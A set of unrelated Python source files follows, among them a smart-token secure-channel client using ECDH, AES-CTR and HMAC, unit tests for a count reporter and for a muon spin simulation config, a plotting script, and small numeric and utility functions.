        """
        apdu = deepcopy(orig_apdu)
        print("=============================================")
        # CTR-mode counter callback: returns the current IV then increments it
        def counter_inc():
            curr_iv = expand(inttostring((stringtoint(self.IV))), 128, "LEFT")
            self.IV = expand(inttostring((stringtoint(self.IV)+1)), 128, "LEFT")
            return str_encode(curr_iv)
        if self.initialized == False:
            # Secure channel not initialized, quit
            print("SCP Error: secure channel not initialized ...")
            return None, None, None
        # Initialize the hmac
        hm = local_hmac.new(self.HMAC_Key, digestmod=hashlib.sha256)
        hm.update(self.IV+chr(apdu.cla)+chr(apdu.ins)+chr(apdu.p1)+chr(apdu.p2))
        data_to_send = ""
        # Empty string means no data in our case!
        if apdu.data == "":
            apdu.data = None
        if apdu.data != None:
            print(">>>(encrypted) "+"\033[1;42m["+local_hexlify(apdu.data)+"]\033[1;m")
            # Check length
            if len(apdu.data) > 255:
                print("SCP Error: data size %d too big" % (len(apdu.data)))
                return None, None, None
            # Encrypt the data
            aes = local_AES.new(self.AES_Key, AES.MODE_CTR, counter=counter_inc)
            enc_data = aes.encrypt(apdu.data)
            hm.update(chr(len(apdu.data))+enc_data)
            data_to_send += enc_data
            # Keep the counter in sync with the token when the payload fills
            # an exact number of AES blocks
            if len(apdu.data) % 16 == 0:
                counter_inc()
        else:
            print(">>>(encrypted) "+"\033[1;42m"+"[]"+"\033[1;m")
            counter_inc()
        apdu.le = 0
        hm.update(chr(apdu.le))
        hm_tag = hm.digest()
        # Put the encrypted data plus the hmac tag
        apdu.data = data_to_send + hm_tag
        # Send the APDU on the line
        resp, sw1, sw2 = apdu.send(self.cardservice)
        # Save the old IV before reception for data encryption inside the channel
        old_IV = self.IV
        # Check the response HMAC
        if resp == None:
            print("SCP Error: bad response length (< 32) ...")
            return None, None, None
        if len(resp) < 32:
            print("SCP Error: bad response length %d (< 32) ..." % (len(resp)))
            return None, None, None
        if len(resp) > 256:
            print("SCP Error: response length %d too big" % (len(resp)))
            return None, None, None
        enc_resp_data = resp[:-32]
        resp_hmac_tag = resp[-32:]
        hm = local_hmac.new(self.HMAC_Key, digestmod=hashlib.sha256)
        hm.update(self.IV+chr(sw1)+chr(sw2))
        if len(enc_resp_data) > 0:
            hm.update(chr(len(enc_resp_data)))
            hm.update(enc_resp_data)
        if resp_hmac_tag != hm.digest():
            print("SCP Error: bad response HMAC")
            return None, None, None
        # Now decrypt the data
        if len(enc_resp_data) > 0:
            aes = local_AES.new(self.AES_Key, AES.MODE_CTR, counter=counter_inc)
            dec_resp_data = aes.decrypt(enc_resp_data)
            print("<<<(decrypted) SW1=%02x, SW2=%02x, \033[1;43m[%s]\033[1;m" % (sw1, sw2, local_hexlify(dec_resp_data)))
            if len(enc_resp_data) % 16 == 0:
                counter_inc()
        else:
            counter_inc()
            dec_resp_data = None
            print("<<<(decrypted) SW1=%02x, SW2=%02x, \033[1;43m[]\033[1;m" % (sw1, sw2))
        if (update_session_keys == True) and (sw1 == 0x90) and (sw2 == 0x00):
            # We need the PIN for this command
            if pin == None:
                print("SCP Error: asking for update_session_keys without providing the PIN!")
                return None, None, None
            self.session_keys_update(pin_padding(pin))
        # Do we have to decrypt data inside the channel?
        if (pin_decrypt == True) and (sw1 == 0x90) and (sw2 == 0x00):
            if pin == None:
                print("SCP Error: asking for pin_decrypt without providing the PIN!")
                return None, None, None
            dec_resp_data = self.pin_decrypt_data(pin, dec_resp_data, old_IV)
        return dec_resp_data, sw1, sw2
    # Initialize the secure channel
    def __init__(self, card, encrypted_platform_bin_file, pin, data_type):
        """Mount the secure channel.

        Decrypts the local platform keys (with the token's help), performs a
        signed ECDH exchange with the token, verifies the token's ECDSA
        signature, and derives the AES/HMAC session keys and the IV from the
        shared secret. On crypto/protocol failure the program exits (or, for
        a bad token signature, returns with initialized left False).
        """
        self.cardservice = card
        self.token_type = data_type
        # Decrypt local platform keys. We also keep the current salt and PBKDF2 iterations for later usage
        dec_token_pub_key_data, dec_platform_priv_key_data, dec_platform_pub_key_data, self.dec_firmware_sig_pub_key_data, _, _, self.pbkdf2_salt, self.pbkdf2_iterations = decrypt_platform_data_with_token(encrypted_platform_bin_file, pin, data_type, card)
        # Get the algorithm and the curve
        ret_alg, ret_curve, prime, a, b, gx, gy, order, cofactor = get_curve_from_key(dec_platform_pub_key_data)
        if (ret_alg == None) or (ret_curve == None):
            print("SCP Error: unkown curve or algorithm in the structured keys ...")
            sys.exit(-1)
        # Instantiate it
        c = Curve(a, b, prime, order, cofactor, gx, gy, cofactor * order, ret_alg, None)
        # Generate a key pair for our ECDH
        ecdh_keypair = genKeyPair(c)
        # Sign the public part with our ECDSA private key
        ecdsa_pubkey = PubKey(c, Point(c, stringtoint(dec_platform_pub_key_data[3:3+32]), stringtoint(dec_platform_pub_key_data[3+32:3+64])))
        ecdsa_privkey = PrivKey(c, stringtoint(dec_platform_priv_key_data[3:]))
        ecdsa_keypair = KeyPair(ecdsa_pubkey, ecdsa_privkey)
        to_send = expand(inttostring(ecdh_keypair.pubkey.Y.x), 256, "LEFT")
        to_send += expand(inttostring(ecdh_keypair.pubkey.Y.y), 256, "LEFT")
        to_send += "\x00"*31+"\x01"
        (sig, k) = ecdsa_sign(sha256, ecdsa_keypair, to_send)
        to_send += sig
        # Mount the secure channel with the token
        # Note: the applet should have been already selected by our decrypt_platform_data procedure
        # since we have already exchanged data with the card
        apdu = token_ins("sig", "TOKEN_INS_SECURE_CHANNEL_INIT", data=to_send)
        resp, sw1, sw2 = apdu.send(self.cardservice)
        if (sw1 != 0x90) or (sw2 != 0x00):
            # This is an error
            print("SCP Error: bad response from the token")
            sys.exit(-1)
        if len(resp) != ((3*32) + 64):
            # This is not the response length we expect ...
            print("SCP Error: bad response from the token")
            sys.exit(-1)
        # Extract the ECDSA signature
        ecdsa_token_pubkey = PubKey(c, Point(c, stringtoint(dec_token_pub_key_data[3:3+32]), stringtoint(dec_token_pub_key_data[3+32:3+64])))
        ecdsa_token_sig = resp[3*32:]
        check_sig = ecdsa_verify(sha256, KeyPair(ecdsa_token_pubkey, None), resp[:3*32], ecdsa_token_sig)
        if check_sig == False:
            # Bad signature
            print("SCP Error: bad ECDSA signature in response from the token")
            return
        # Extract ECDH point and compute the scalar multiplication
        ecdh_shared_point = (ecdh_keypair.privkey.x) * Point(c, stringtoint(resp[:32]), stringtoint(resp[32:64]))
        ecdh_shared_secret = expand(inttostring(ecdh_shared_point.x), 256, "LEFT")
        # Derive our keys
        # AES Key = SHA-256("AES_SESSION_KEY" | shared_secret) (first 128 bits)
        (self.AES_Key, _, _) = local_sha256("AES_SESSION_KEY"+ecdh_shared_secret)
        self.AES_Key = self.AES_Key[:16]
        # HMAC Key = SHA-256("HMAC_SESSION_KEY" | shared_secret) (256 bits)
        (self.HMAC_Key, _, _) = local_sha256("HMAC_SESSION_KEY"+ecdh_shared_secret)
        # IV = SHA-256("SESSION_IV" | shared_secret) (first 128 bits)
        (self.IV, _, _) = local_sha256("SESSION_IV"+ecdh_shared_secret)
        self.IV = self.IV[:16]
        self.first_IV = self.IV
        # The secure channel is now initialized
        self.initialized = True
        return
    # ====== Common token helpers
    # Helper to unlock PET PIN
    def token_unlock_pet_pin(self, pet_pin):
        return self.send(token_ins(self.token_type, "TOKEN_INS_UNLOCK_PET_PIN", data=pin_padding(pet_pin)), pin=pet_pin, update_session_keys=True)
    # Helper to unlock user PIN
    def token_unlock_user_pin(self, user_pin = None):
        if user_pin == None:
            user_pin = get_user_input("Please provide "+self.token_type.upper()+" USER pin:\n")
        return self.send(token_ins(self.token_type, "TOKEN_INS_UNLOCK_USER_PIN", data=pin_padding(user_pin)), pin=user_pin, update_session_keys=True)
    # Helper to get the PET name
    def token_get_pet_name(self):
        return self.send(token_ins(self.token_type, "TOKEN_INS_GET_PET_NAME"))
    # Helpers to lock the token
    def token_user_pin_lock(self):
        return self.send(token_ins(self.token_type, "TOKEN_INS_USER_PIN_LOCK"))
    def token_full_lock(self):
        return self.send(token_ins(self.token_type, "TOKEN_INS_FULL_LOCK"))
    # Helper to set the user PIN
    def token_set_user_pin(self, new_user_pin = None):
        if new_user_pin == None:
            new_user_pin = get_user_input("Please provide the *new* "+self.token_type.upper()+" user PIN:\n")
        return self.send(token_ins(self.token_type, "TOKEN_INS_SET_USER_PIN", data=pin_padding(new_user_pin)), pin=new_user_pin, update_session_keys=True)
    # Helper to set the PET PIN
    def token_set_pet_pin(self, new_pet_pin = None):
        if new_pet_pin == None:
            new_pet_pin = get_user_input("Please provide the *new* "+self.token_type.upper()+" PET PIN:\n")
        # We compute and send the PBKDF2 of the new PET PIN
        dk = local_pbkdf2_hmac('sha512', new_pet_pin, self.pbkdf2_salt, self.pbkdf2_iterations)
        return self.send(token_ins(self.token_type, "TOKEN_INS_SET_PET_PIN", data=pin_padding(new_pet_pin)+dk), pin=new_pet_pin, update_session_keys=True)
    # Helper to set the PET name
    def token_set_pet_name(self, new_pet_name = None):
        if new_pet_name == None:
            new_pet_name = get_user_input("Please provide the *new* "+self.token_type.upper()+" PET name:\n")
        return self.send(token_ins(self.token_type, "TOKEN_INS_SET_PET_NAME", data=new_pet_name))
    def token_get_random(self, size):
        """Ask the token for `size` random bytes (size must fit in one byte)."""
        if size > 255:
            # This is an error
            print("Token Error: bad length %d > 255 for TOKEN_INS_GET_RANDOM" % (size))
            return None, None, None
        return self.send(token_ins(self.token_type, "TOKEN_INS_GET_RANDOM", data=chr(size)))
    def token_echo_test(self, data):
        return self.send(token_ins(self.token_type, "TOKEN_INS_ECHO_TEST", data=data))
    def token_secure_channel_echo(self, data):
        return self.send(token_ins(self.token_type, "TOKEN_INS_SECURE_CHANNEL_ECHO", data=data))
    # ====== AUTH specific helpers
    def token_auth_get_key(self, pin):
        if self.token_type != "auth":
            print("AUTH Token Error: asked for TOKEN_INS_GET_KEY for non AUTH token ("+self.token_type.upper()+")")
            # This is an error
            return None, None, None
        return self.send(token_ins(self.token_type, "TOKEN_INS_GET_KEY"), pin=pin, pin_decrypt=True)
    # ====== DFU specific helpers
    def token_dfu_begin_decrypt_session(self, header_data):
        if self.token_type != "dfu":
            print("DFU Token Error: asked for TOKEN_INS_BEGIN_DECRYPT_SESSION for non DFU token ("+self.token_type.upper()+")")
            # This is an error
            return None, None, None
        return self.send(token_ins(self.token_type, "TOKEN_INS_BEGIN_DECRYPT_SESSION", data=header_data))
    def token_dfu_derive_key(self, chunk_num):
        if self.token_type != "dfu":
            print("DFU Token Error: asked for TOKEN_INS_DERIVE_KEY for non DFU token ("+self.token_type.upper()+")")
            # This is an error
            return None, None, None
        return self.send(token_ins(self.token_type, "TOKEN_INS_DERIVE_KEY", data=chr((chunk_num >> 8) & 0xff)+chr(chunk_num & 0xff)))
    # ====== SIG specific helpers
    def token_sig_begin_sign_session(self, header_data):
        if self.token_type != "sig":
            print("SIG Token Error: asked for TOKEN_INS_BEGIN_SIGN_SESSION for non SIG token ("+self.token_type.upper()+")")
            # This is an error
            return None, None, None
        return self.send(token_ins(self.token_type, "TOKEN_INS_BEGIN_SIGN_SESSION", data=header_data))
    def token_sig_derive_key(self, chunk_num):
        if self.token_type != "sig":
            print("SIG Token Error: asked for TOKEN_INS_DERIVE_KEY for non SIG token ("+self.token_type.upper()+")")
            # This is an error
            return None, None, None
        return self.send(token_ins(self.token_type, "TOKEN_INS_DERIVE_KEY", data=chr((chunk_num >> 8) & 0xff)+chr(chunk_num & 0xff)))
    def token_sig_sign_firmware(self, to_sign):
        if self.token_type != "sig":
            print("SIG Token Error: asked for TOKEN_INS_SIGN_FIRMWARE for non SIG token ("+self.token_type.upper()+")")
            # This is an error
            return None, None, None
        return self.send(token_ins(self.token_type, "TOKEN_INS_SIGN_FIRMWARE", data=to_sign))
    def token_sig_verify_firmware(self, to_verify):
        if self.token_type != "sig":
            print("SIG Token Error: asked for TOKEN_INS_VERIFY_FIRMWARE for non SIG token ("+self.token_type.upper()+")")
            # This is an error
            return None, None, None
        return self.send(token_ins(self.token_type, "TOKEN_INS_VERIFY_FIRMWARE", data=to_verify))
    def token_sig_get_sig_type(self):
        if self.token_type != "sig":
            print("SIG Token Error: asked for TOKEN_INS_GET_SIG_TYPE for non SIG token ("+self.token_type.upper()+")")
            # This is an error
            return None, None, None
        return self.send(token_ins(self.token_type, "TOKEN_INS_GET_SIG_TYPE"))
# Helper to fully unlock a token, which is the first step to
# access advanced features of a token
def token_full_unlock(card, token_type, local_keys_path, pet_pin = None, user_pin = None, force_pet_name_accept = False):
    """Fully unlock a token: mount the SCP, check PET pin and name, unlock USER pin.

    Returns the established SCP instance; exits the program on any failure
    or when the user rejects the displayed PET name. Missing PINs are
    prompted for interactively.
    """
    # ======================
    # Get the PET PIN for local ECDH keys decryption
    if pet_pin == None:
        pet_pin = get_user_input("Please provide "+token_type.upper()+" PET pin:\n")
    # Establish the secure channel with the token
    scp = SCP(card, local_keys_path, pet_pin, token_type)
    resp, sw1, sw2 = scp.token_unlock_pet_pin(pet_pin)
    if (sw1 != 0x90) or (sw2 != 0x00):
        # First response byte carries the remaining tries counter
        print("\033[1;41m Error: PET pin seems wrong! Beware that only %d tries are allowed ...\033[1;m" % ord(resp[0]))
        sys.exit(-1)
    resp, sw1, sw2 = scp.token_get_pet_name()
    if (sw1 != 0x90) or (sw2 != 0x00):
        print("\033[1;41m Error: something wrong happened when getting the PET name ...\033[1;m")
        sys.exit(-1)
    if force_pet_name_accept == False:
        answer = None
        while answer != "y" and answer != "n":
            answer = get_user_input("\033[1;44m PET NAME CHECK! \033[1;m\n\nThe PET name for the "+token_type.upper()+" token is '"+resp+"', is it correct? Enter y to confirm, n to cancel [y/n].")
        if answer != "y":
            sys.exit(-1)
    else:
        print("\033[1;44m PET NAME CHECK! \033[1;m\n\nThe PET name for the "+token_type.upper()+" token is '"+resp+"' ...")
    resp, sw1, sw2 = scp.token_unlock_user_pin(user_pin)
    if (sw1 != 0x90) or (sw2 != 0x00):
        print("\033[1;41m Error: USER pin seems wrong! Beware that only %d tries are allowed ...\033[1;m" % ord(resp[0]))
        sys.exit(-1)
    return scp
|
import unittest
from datetime import datetime
from test.support import captured_stdout
from src.entity.count_entity import CountEntity
from src.interface_adapter.in_memory_count_repository import \
InMemoryCountRepository
from src.interface_adapter.report_count_presenter import ReportCountPresenter
from src.use_case.report_count_use_case_interactor import \
ReportCountUseCaseInteractor
class TestReportCountUseCaseInteractor(unittest.TestCase):
    """Behavioural tests for ReportCountUseCaseInteractor.

    Seeds an in-memory repository with category counts for two consecutive
    dates so the report can show latest values plus day-over-day deltas.
    """
    def setUp(self) -> None:
        """Populate the repository with two days of category counts."""
        self.repository = InMemoryCountRepository()
        self.presenter = ReportCountPresenter()
        dates = [datetime(2020, 1, 1), datetime(2020, 1, 2)]
        counts = [CountEntity(dates[0], "increase", 2),
                  CountEntity(dates[0], "no_change", 2),
                  CountEntity(dates[0], "decrease", 2),
                  CountEntity(dates[0], "disappear", 2),
                  CountEntity(dates[1], "increase", 4),
                  CountEntity(dates[1], "no_change", 2),
                  CountEntity(dates[1], "decrease", 1),
                  CountEntity(dates[1], "appear", 2)]
        self.repository.save_timestamps(dates)
        self.repository.save(counts)
        return super().setUp()
    def test_create(self):
        """Construction with repository and presenter must not raise."""
        # Execute
        ReportCountUseCaseInteractor(self.repository, self.presenter)
    # @unittest.skip('after InMemoryRepository.get_timestamps')
    def test_handle(self):
        """handle() prints latest counts with deltas against the previous day."""
        # Execute
        interactor = ReportCountUseCaseInteractor(
            self.repository, self.presenter)
        with captured_stdout() as stdout:
            interactor.handle()
        # Assert
        self.assertIn('4 ( +2) increase', stdout.getvalue())
        self.assertIn('2 ( +0) no_change', stdout.getvalue())
        self.assertIn('1 ( -1) decrease', stdout.getvalue())
        self.assertIn('2 ( +2) appear', stdout.getvalue())
        self.assertIn('0 ( -2) disappear', stdout.getvalue())
        self.assertIn('9 ( +1) TOTAL', stdout.getvalue())
|
import numpy as np
import os
import utils.utils as util
import pylab
def setFigLinesBW(fig):
    """
    Take each axes in the figure, and for each line in the axes, make the
    line viewable in black and white.
    """
    for axes in fig.get_axes():
        setAxLinesBW(axes)
def setAxLinesBW(ax):
    """
    Take each Line2D in the axes, ax, and convert the line style to be
    suitable for black and white viewing.
    """
    marker_size = 3
    # Every colour currently maps to the same neutral style (no marker,
    # solid dash pattern).
    style_map = {color: {'marker': "None", 'dash': (None, None)}
                 for color in ('r', 'g', 'm', 'b', 'c', 'y', 'k')}
    for line in ax.get_lines():
        style = style_map[line.get_color()]
        line.set_dashes(style['dash'])
        line.set_marker(style['marker'])
        line.set_markersize(marker_size)
def get_csf_ls(base_dir, number):
    """Collect contrast metrics for epochs 0..number-1 under base_dir.

    Reads <base_dir>/<epoch>/metric.json for each epoch and returns four
    parallel lists: conv5, fc6 and fc7 contrast values, plus epoch indices.
    """
    conv5_ls, fc6_ls, fc7_ls, epochs = [], [], [], []
    for epoch in range(number):
        metric_path = os.path.join(base_dir, str(epoch), 'metric.json')
        metrics = util.load_metric_json(metric_path)
        conv5_ls.append(metrics['contrast_conv5'])
        fc6_ls.append(metrics['contrast_fc'])
        fc7_ls.append(metrics['contrast_embedding'])
        epochs.append(epoch)
    return conv5_ls, fc6_ls, fc7_ls, epochs
def main():
    """Plot RMS contrast curves (l2 vs cos distance) over epochs and save the figure."""
    l2_base_dir = '/media/admin228/00027E210001A5BD/train_pytorch/change_detection/CMU/prediction_cons/l2_5,6,7/roc'
    cos_base_dir = '/media/admin228/00027E210001A5BD/train_pytorch/change_detection/CMU/prediction_cons/dist_cos_new_5,6,7/roc'
    CSF_dir = os.path.join(l2_base_dir)
    CSF_fig_dir = os.path.join(l2_base_dir,'fig.png')
    end_number = 22
    csf_conv5_l2_ls,csf_fc6_l2_ls,csf_fc7_l2_ls,x_l2 = get_csf_ls(l2_base_dir,end_number)
    csf_conv5_cos_ls,csf_fc6_cos_ls,csf_fc7_cos_ls,x_cos = get_csf_ls(cos_base_dir,end_number)
    Fig = pylab.figure()
    #pylab.plot(x,csf_conv4_ls, color='k',label= 'conv4')
    pylab.plot(x_l2,csf_conv5_l2_ls, color='m',label= 'l2:conv5')
    pylab.plot(x_l2,csf_fc6_l2_ls, color = 'b',label= 'l2:fc6')
    pylab.plot(x_l2,csf_fc7_l2_ls, color = 'g',label= 'l2:fc7')
    pylab.plot(x_cos,csf_conv5_cos_ls, color='c',label= 'cos:conv5')
    pylab.plot(x_cos,csf_fc6_cos_ls, color = 'r',label= 'cos:fc6')
    pylab.plot(x_cos,csf_fc7_cos_ls, color = 'y',label= 'cos:fc7')
    # Convert lines to B/W-friendly styles AFTER they exist; the original
    # called this right after pylab.figure(), when the figure had no axes
    # or lines yet, so it silently did nothing.
    setFigLinesBW(Fig)
    pylab.legend(loc='lower right', prop={'size': 10})
    pylab.ylabel('RMS Contrast', fontsize=14)
    pylab.xlabel('Epoch', fontsize=14)
    pylab.savefig(CSF_fig_dir)
# Script entry point
if __name__ == '__main__':
    main()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# droxi
# Copyright (c) 2014, Andrew Robbins, All rights reserved.
#
# This library ("it") is free software; it is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; you can redistribute it and/or modify it under the terms of the
# GNU Lesser General Public License ("LGPLv3") <https://www.gnu.org/licenses/lgpl.html>.
from __future__ import absolute_import
from __future__ import print_function
from ...models import Sym
from ..config import DROSOFT_CDBASE
from .null import DNull
class DPrint(Sym):
    """Symbol for prog2#print: writes its arguments to stderr without a newline."""
    _symbolCdbase = DROSOFT_CDBASE
    _symbolCd = 'prog2'
    _symbolName = 'print'
    url = _symbolCdbase + '/' + _symbolCd + '#' + _symbolName
    def __call__(self, *args):
        import sys
        pieces = [str(arg) for arg in args]
        print(*pieces, end='', file=sys.stderr)
        return DNull()
class DPrintLine(Sym):
    """Symbol for prog2#println: writes its arguments to stderr followed by a newline."""
    _symbolCdbase = DROSOFT_CDBASE
    _symbolCd = 'prog2'
    _symbolName = 'println'
    url = _symbolCdbase + '/' + _symbolCd + '#' + _symbolName
    def __call__(self, *args):
        import sys
        pieces = [str(arg) for arg in args]
        print(*pieces, file=sys.stderr)
        return DNull()
|
import random
def double(x):
    """Return twice the given value."""
    return x + x
def test_executor_basic(fx, try_tutorial_endpoint):
    """Test executor interface"""
    value = random.randint(0, 100)
    future = fx.submit(double, value, endpoint_id=try_tutorial_endpoint)
    expected = value * 2
    assert future.result(timeout=10) == expected, "Got wrong answer"
|
def binarySearch(array, key):
    """Return an index of `key` in the sorted `array`, or None if absent.

    Precondition: `array` must be sorted in ascending order.
    """
    lo, hi = 0, len(array) - 1
    while lo <= hi:
        middle = (lo + hi) // 2
        candidate = array[middle]
        if candidate == key:
            return middle
        # Narrow the half that cannot contain the key
        if candidate < key:
            lo = middle + 1
        else:
            hi = middle - 1
    return None
# Binary search requires sorted input; the original passed [2, 5, 3, 15, 64]
# (unsorted) and only found 64 by luck.
print(binarySearch([2, 3, 5, 15, 64], 64))
|
import numpy as np
#######################################################
# put `sigmoid_forward` and `sigmoid_grad_input` here #
#######################################################
def sigmoid_forward(x_input):
    """sigmoid nonlinearity
    # Arguments
        x_input: np.array of size `(n_objects, n_in)`
    # Output
        the output of the sigmoid layer
        np.array of size `(n_objects, n_in)`
    """
    # Vectorized: np.exp broadcasts over the whole array at once, replacing
    # the per-row Python loop of the original. (Also fixes the docstring,
    # which wrongly said "relu layer".)
    return 1.0 / (1.0 + np.exp(-np.asarray(x_input)))
def sigmoid_grad_input(x_input, grad_output):
    """sigmoid nonlinearity gradient.
    Calculate the partial derivative of the loss
    with respect to the input of the layer
    # Arguments
        x_input: np.array of size `(n_objects, n_in)`
        grad_output: np.array of size `(n_objects, n_in)`
            dL / df
    # Output
        the partial derivative of the loss
        with respect to the input of the function
        np.array of size `(n_objects, n_in)`
        dL / dh
    """
    # d sigma/dx = sigma * (1 - sigma); chain rule with the upstream gradient.
    # Fully vectorized — the original built a Python list per row and relied
    # on a fragile `list * ndarray` broadcast.
    s = 1.0 / (1.0 + np.exp(-np.asarray(x_input)))
    return s * (1.0 - s) * grad_output
#######################################################
# put `nll_forward` and `nll_grad_input` here #
#######################################################
def nll_forward(target_pred, target_true):
    """Compute the value of NLL
    for a given prediction and the ground truth
    # Arguments
        target_pred: predictions - np.array of size `(n_objects, 1)`
        target_true: ground truth - np.array of size `(n_objects, 1)`
    # Output
        the value of NLL for a given prediction and the ground truth
        scalar
    """
    n = len(target_pred)
    # Per-object binary cross-entropy terms, averaged with a sign flip
    per_object = (target_true * np.log(target_pred)
                  + (1 - target_true) * np.log(1 - target_pred))
    return -(1 / n) * np.sum(per_object)
def nll_grad_input(target_pred, target_true):
    """Compute the partial derivative of NLL
    with respect to its input
    # Arguments
        target_pred: predictions - np.array of size `(n_objects, 1)`
        target_true: ground truth - np.array of size `(n_objects, 1)`
    # Output
        the partial derivative
        of NLL with respect to its input
        np.array of size `(n_objects, 1)`
    """
    numerator = target_pred - target_true
    denominator = target_pred * (1 - target_pred)
    # Averaged over the batch
    return (numerator / denominator) * (1 / len(target_pred))
import re
from dataclasses import dataclass
from inspect import isclass
from numbers import Number
from typing import Any, Iterable, Tuple, Type, TypeVar
import numpy as np
from numpy.typing import NDArray
# Bound TypeVar so classmethod constructors can return the concrete subclass type.
T = TypeVar("T", bound="RecordBase")
# Splits CamelCase class names into words (used by RecordBase.class_name()).
_CAMEL_CASE_REGEX: re.Pattern = re.compile(r"([A-Z0-9][a-z0-9]+)")
@dataclass(frozen=True)
class RecordBase:
    """Immutable base class for tabular records.

    Subclasses add typed fields; numeric (non-ID) fields can be extracted
    as a float vector via numeric(), and batches are built with new().
    """
    # Sequential record identifier, assigned by new(); excluded from numeric().
    ID: int
    def numeric(self) -> NDArray[np.float64]:
        """Return all Number-typed fields except ID as a float64 vector.

        NOTE(review): relies on `v.type` being an actual class — this breaks
        if `from __future__ import annotations` (string annotations) is ever
        added to this module.
        """
        return np.array(
            [
                self.__dict__[k]
                for k, v in self.__dataclass_fields__.items()
                if isclass(v.type) and issubclass(v.type, Number) and k != "ID"
            ],
            dtype=np.float64,
        )
    @classmethod
    def new(cls: Type[T], data: Iterable[Iterable[Any]]) -> Tuple[T, ...]:
        """Build a record per row of `data`, using the row index as ID.

        (Annotation fixed: `Tuple[T]` meant a 1-tuple; this returns a
        variable-length tuple.)
        """
        return tuple(
            cls(index, *(e for e in row)) for index, row in enumerate(data)
        )
    @classmethod
    def class_name(cls):
        """Return the class name split into lowercase space-separated words."""
        return " ".join(_CAMEL_CASE_REGEX.findall(cls.__qualname__)).lower()
    def __len__(self):
        # A single record always counts as one row.
        return 1
def autoscale(data: NDArray[np.float64]) -> NDArray[np.float64]:
    """Column-wise z-score standardization of a 2-D array.

    Each column is shifted to zero mean and scaled to unit (population)
    standard deviation. Vectorized with axis-wise reductions instead of the
    original per-column Python loop + double transpose.
    """
    return (data - data.mean(axis=0)) / data.std(axis=0)
def to_numpy_array(data: Tuple[RecordBase]) -> NDArray[np.float64]:
    """Stack the numeric vectors of all records into one 2-D float64 array."""
    rows = [record.numeric() for record in data]
    return np.array(rows, dtype=np.float64)
|
import unittest
import numpy as np
from io import StringIO
from ase.quaternions import Quaternion
from muspinsim.input import MuSpinInput
from muspinsim.simconfig import MuSpinConfig, MuSpinConfigError
class TestConfig(unittest.TestCase):
    """Tests for MuSpinConfig: building a simulation configuration from a
    parsed MuSpinInput, validating its error handling, orientation
    averaging, and fitting-mode setup.

    NOTE(review): the indentation inside the triple-quoted input strings was
    lost in this copy of the file; muspinsim's input parser distinguishes
    keyword lines from their (indented) value lines, so the exact leading
    whitespace below should be confirmed against the original file.
    """

    def test_config(self):
        # A full-featured input: three spins, scanned field/temperature
        # ranges, a two-orientation powder average, a polarization vector
        # and one of each supported interaction term.
        stest = StringIO(
            """
spins
    mu 2H e
field
    range(1, 11, 2)
temperature
    range(0, 10, 2)
time
    range(0, 10, 21)
orientation
    0 0
    0 180
polarization
    0 1 1
zeeman 1
    1 0 0
dipolar 1 2
    0 1 0
hyperfine 1 3
    10 2 2
    2 10 2
    2 2 10
quadrupolar 2
    -2 0 0
    0 1 0
    0 0 1
dissipation 2
    0.1
"""
        )
        itest = MuSpinInput(stest)
        cfg = MuSpinConfig(itest.evaluate())

        self.assertEqual(cfg.name, "muspinsim")
        # 2 field values x 2 temperatures x 2 orientations = 8 snapshots
        self.assertEqual(len(cfg), 8)
        # Results are indexed by the two file ranges (field, temperature)
        # and the 21-point time axis; orientations are averaged out.
        self.assertEqual(cfg.results.shape, (2, 2, 21))

        # Try getting one configuration snapshot
        cfg0 = cfg[0]
        self.assertTrue((cfg0.B == [0, 0, 1]).all())
        self.assertEqual(cfg0.T, 0)
        self.assertTrue((cfg0.t == np.linspace(0, 10, 21)).all())
        # Polarization vector should be normalised to unit length.
        self.assertTrue(np.isclose(np.linalg.norm(cfg0.mupol), 1.0))

        # Now try recording results: store a flat slice of ones for every
        # snapshot and check they land in the results array.
        for c in cfg:
            res = np.ones(len(c.t))
            cfg.store_time_slice(c.id, res)

        self.assertTrue((cfg.results == 1).all())

        # System checks: spin species ("2H" becomes an ("H", 2) isotope
        # tuple), interaction term count and dissipation coupling.
        self.assertEqual(cfg.system.spins[0], "mu")
        self.assertEqual(cfg.system.spins[1], ("H", 2))
        self.assertEqual(cfg.system.spins[2], "e")
        self.assertEqual(len(cfg.system._terms), 4)
        self.assertEqual(cfg._dissip_terms[1], 0.1)

        # Axis classification: B and T are file ranges, t is the x axis,
        # orientation is an averaging range.
        self.assertIn("B", cfg._file_ranges)
        self.assertIn("T", cfg._file_ranges)
        self.assertIn("t", cfg._x_range)
        self.assertIn("orient", cfg._avg_ranges)

        # Now try a few errors

        # Zeeman term referencing a spin index that does not exist.
        stest = StringIO(
            """
spins
    mu e
zeeman 3
    0 0 1
"""
        )

        itest = MuSpinInput(stest)

        with self.assertRaises(MuSpinConfigError):
            cfg = MuSpinConfig(itest.evaluate())

        # Zeeman term with the wrong number of vector components.
        stest = StringIO(
            """
spins
    mu e
zeeman 1
    2 0
"""
        )

        itest = MuSpinInput(stest)

        with self.assertRaises(MuSpinConfigError):
            cfg = MuSpinConfig(itest.evaluate())

        # y_axis "integral" without the required supporting settings.
        stest = StringIO(
            """
y_axis
    integral
"""
        )

        itest = MuSpinInput(stest)

        with self.assertRaises(MuSpinConfigError):
            cfg = MuSpinConfig(itest.evaluate())

    def test_orient(self):
        # Some special tests to check how orientations are dealt with

        # Weighted orientations: the weights should be kept as given
        # (sum of 3.0 here would mean normalisation happened).
        stest = StringIO(
            """
orientation
    0 0 0 1.0
    0.5*pi 0 0 2.0
"""
        )

        itest = MuSpinInput(stest)
        cfg = MuSpinConfig(itest.evaluate())

        orange = cfg._avg_ranges["orient"]

        self.assertEqual(sum([w for (q, w) in orange]), 2.0)
        self.assertTrue(
            np.isclose(orange[1][0].q, [2 ** (-0.5), 0, 0, -(2 ** (-0.5))]).all()
        )

        # Some more complex euler angles combinations
        rng = np.linspace(0, np.pi, 4)
        angles = np.array(np.meshgrid(*[rng, rng, rng])).reshape((3, -1)).T
        ablock = "\n".join(map(lambda x: "\t{0} {1} {2}".format(*x), angles))

        stest = StringIO("orientation\n" + ablock)
        itest = MuSpinInput(stest)
        cfg = MuSpinConfig(itest.evaluate())

        # Default mode is ZYZ: each triple (a, b, c) should equal the
        # conjugate of Rz(c) * Ry(b) * Rz(a).
        for ((a, b, c), (q1, w)) in zip(angles, cfg._avg_ranges["orient"]):
            q2 = Quaternion.from_axis_angle([0, 0, 1], c)
            q2 *= Quaternion.from_axis_angle([0, 1, 0], b)
            q2 *= Quaternion.from_axis_angle([0, 0, 1], a)
            q2 = q2.conjugate()
            self.assertTrue(np.isclose(q1.q, q2.q).all())

